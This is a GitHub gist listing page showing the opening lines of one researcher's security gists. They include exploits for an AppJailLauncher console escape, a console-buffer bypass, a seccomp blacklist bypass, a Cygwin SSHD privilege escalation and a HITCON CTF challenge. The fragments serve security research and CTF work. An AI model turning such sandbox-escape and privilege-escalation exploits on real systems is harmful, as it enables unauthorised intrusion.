Skip to content

Instantly share code, notes, and snippets.

@masthoon
masthoon / _writeup.md
Created December 17, 2022 20:06
MaxDebugger
@masthoon
masthoon / bgrep.c
Created April 30, 2022 20:39
bgrep.c
// dirty stolen code
#include <unistd.h>
#include <sys/types.h>
#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <stdlib.h>
@masthoon
masthoon / appjaillauncher_exploit.cpp
Last active November 29, 2023 14:07
AppJailLauncher console escape
#define UNICODE
#define _UNICODE
#include <iostream>
#include <string>
#include <Windows.h>
#include <Psapi.h>
#include <fstream>
#pragma comment(lib, "ntdll.lib")
#pragma comment(lib, "Psapi")
@masthoon
masthoon / extract_fw_rfu.py
Created August 18, 2021 18:36
Extract and decompress parts of RFU firmware
import sys
import struct
import lzma
PJL_ESC = b'\x1b%-12345X'
def parse_pjl_command(fw):
assert(fw[0] == 0x20)
cmd, info = fw[1:256].split(b' ', 1)
name, value = info.split(b'=', 1)
@masthoon
masthoon / convuln.cpp
Last active November 29, 2023 14:19
Console Input Buffer security
/*
MiniPoc for console buffer security bypass
Instructions
- Compile with x64 Native Tools Command Prompt for VS 2019
* cl /Zi /std:c++latest minipoc.cpp
- Copy executable and apply Low Integrity directly to the file
* copy minipoc.exe minipoclow.exe
* icacls minipoclow.exe /setintegritylevel Low
(/Zi for pdb generation)
@masthoon
masthoon / MichaelStorage.py
Created November 29, 2020 20:23
MichaelStorage Exploit HITCON 2020
import time
from pwintools import *
# Interact with binary
def act_alloc(type, size):
proc.sendline('1')
proc.recvuntil(':')
proc.sendline(str(type))
proc.recvuntil(':')
proc.sendline(str(size))
@masthoon
masthoon / sparc_emu.py
Created May 25, 2020 19:42
Sun? On my Sat? unicorn sparc emulation
import sys
import lief # py2.7 v0.9.0
from unicorn import *
from unicorn.sparc_const import *
import capstone
'''
Sample output with mu.input = FLAG_EXPLOIT_CMD:
puts(Configuration Server: Running)
sleep()
@masthoon
masthoon / seccomp_bypass_x32_compat.c
Last active December 17, 2022 16:55
Demo of seccomp-BPF blacklist bypass on systemd - Ubuntu
/*
root@ubuntu:/# gcc seccomp_bypass_x32_compat.c -w -static -o test
root@ubuntu:/# cat /etc/systemd/system/test.service
[Unit]
Description=Test attack
[Service]
Type=oneshot
# Remove IO from the service
SystemCallFilter=~@basic-io
# Limit ABI to x64 only
@masthoon
masthoon / lsass.py
Created February 2, 2019 07:28
Add users / groups listing & privileges
import windows.rpc
from windows.rpc import ndr
import windows.generated_def as gdef
import ctypes
class PLSAPR_OBJECT_ATTRIBUTES(ndr.NdrStructure):
MEMBERS = [ndr.NdrLong,
ndr.NdrUniquePTR(ndr.NdrWString),
ndr.NdrUniquePTR(ndr.NdrLong), # We dont care of the subtype as we will pass None
@masthoon
masthoon / cygeop.cpp
Created January 21, 2019 07:54
Cygwin SSHD EoP
// CygEOP.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <Windows.h>
#include <psapi.h>
#pragma comment(lib, "ntdll.lib")
#define STATUS_SUCCESS 0